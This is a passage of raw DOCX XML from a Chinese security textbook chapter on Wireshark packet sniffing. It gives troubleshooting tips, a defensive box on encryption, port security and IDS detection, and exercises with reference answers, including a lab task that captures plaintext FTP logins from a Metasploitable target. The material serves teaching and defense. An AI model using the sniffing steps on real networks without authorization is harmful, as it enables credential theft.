        <w:t xml:space="preserve">，无法打开接口进行抓包。解决：</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">sudo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">运行，或将用户加入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">wireshark</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">组并重新登录（需慎用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> setuid </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">dumpcap）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">看不到靶机发出的非广播包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：因为交换网络只将目标</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">为攻击机的帧发过来。混杂模式下也只能看到发往本机或广播的包。这是正确行为，说明需要</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗或端口镜像才能看到靶机与其他主机的单播通信。如果实验只有两台机器且直连（或通过虚拟交换机），攻击机发往靶机的包，靶机回复的帧目标</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">是攻击机，所以能够看见来回流量；但若存在第三条主机间的通信，则不可见。请确认实验拓扑。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">-</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">显示乱码</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：可能是误选了无关接口，或捕获了加密协议（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH），看见的自然是密文。确认服务本身是明文的（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">FTP/Telnet），并检查TCP流。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">防御对照框：加密传输与嗅探失效</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BlockText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">蓝队防御原则</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">1.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">端到端加密</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：对所有敏感通信使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS/SSL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">或</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH，如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTPS（HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> over </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">TLS）、FTPS、SFTP、Telnet</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">替换为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH。一旦应用层加密，被动嗅探仅能得到密文，凭据泄露风险极大降低。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">现代最佳实践</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：废弃明文协议，强制</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">HSTS（HTTP</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Strict Transport </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Security）以避免降级攻击，并在内部网络中同样推行加密（Zero</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Trust </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">原则）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">2.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网络访问控制</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：实施</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 802.1X </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">网络准入，防止未授权设备接入局域网，减少攻击者获得网络访问的可能。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">3.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">检测嗅探与混杂模式</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：使用工具（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">nmap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">--script=sniffer-detect</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">）或网络策略检测网卡是否处于混杂模式；在交换机端口上启用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">端口安全（Port</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Security）</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">限制</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址数量，防止</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> CAM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">表攻击；监控异常数量的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求（可能是欺骗前兆，详见</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 6.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节防御）。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">4.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">网络分段与微分段</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：将敏感系统划分到不同</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> VLAN </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">并使用防火墙控制访问，即使攻击者进入网络，嗅探到的流量也被限制在最小范围内。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">5.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">日志与流量审计</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：采集</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> NetFlow/sFlow </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">数据并设置</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> IDS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">规则（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Suricata、Snort，详见卷五第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 19 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章）检测明文协议传输凭据的行为（例如检测</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> FTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">控制连接中出现</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> PASS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">命令并告警），以此发现未授权或疏于加密的服务。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">此外，需要认识到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">加密使得被动嗅探失效</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">，攻击者若要获取明文，就必须进行中间人攻击（如</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> + SSL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">降级/剥离），这正是</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 6.2 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">节的核心内容。防御者通过使用证书锁定（Certificate</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Pinning）、强壮</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">配置和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HSTS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">可以挫败大部分降级攻击。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">交叉回指框</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">本节大量复用《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 26–27 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TCP/IP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">协议行为，抓包即是在真实环境中验证这些协议行为。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">防御措施中涉及的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">ACL、防火墙和</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> TLS </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">原理详见《从位到物联》第</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 28 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">章，本书不再重复。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:pict>
          <v:rect style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="FirstParagraph"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">习题与迁移任务</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提取题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：简述</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Wireshark </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">显示过滤器和捕获过滤器的区别，并各举一例。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：从执行阶段和语法支持考虑。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">参考答案</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：捕获过滤器在抓包时由</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> libpcap </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> BPF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">语法执行，不能基于应用层细节过滤，目的是减少捕获量；显示过滤器在已捕获数据上对帧进行过滤，支持协议字段深度解析，灵活但需事后分析。例：捕获过滤器</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tcp port 80</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">只抓</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 80 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">端口的包；显示过滤器</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">http.request.uri contains "login"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">筛选出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> URI </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">中包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> login </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> HTTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">请求。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">提取题</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> 2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在交换式以太网中，为何仅开启混杂模式通常无法看到其他主机之间的单播流量？要想实现全面嗅探，攻击者通常需要什么额外手段？</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">提示</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：复习交换机转发逻辑。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t xml:space="preserve">参考答案</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：交换机基于</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">地址表进行端口转发，单播帧仅被发往目的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> MAC </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">对应的端口，不会泛洪到所有端口，因此混杂模式只能收到发往本机、广播及多播帧。额外手段包括</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> ARP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">欺骗（使流量绕经攻击机）、MAC</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">泛洪（迫使交换机进入</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hub </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">模式，但现代交换机有防御）或端口镜像（需管理权限）。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="BodyText"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">迁移任务</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">：在授权靶机环境中，使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tshark</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">捕获</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Metasploitable </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> FTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">登录过程，并将结果保存为</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">.pcap</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">文件。随后用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="VerbatimChar"/>
        </w:rPr>
        <w:t xml:space="preserve">tshark -r &lt;file.pcap&gt; -Y "ftp"</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">查看</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> FTP </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">相关包，提取出</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
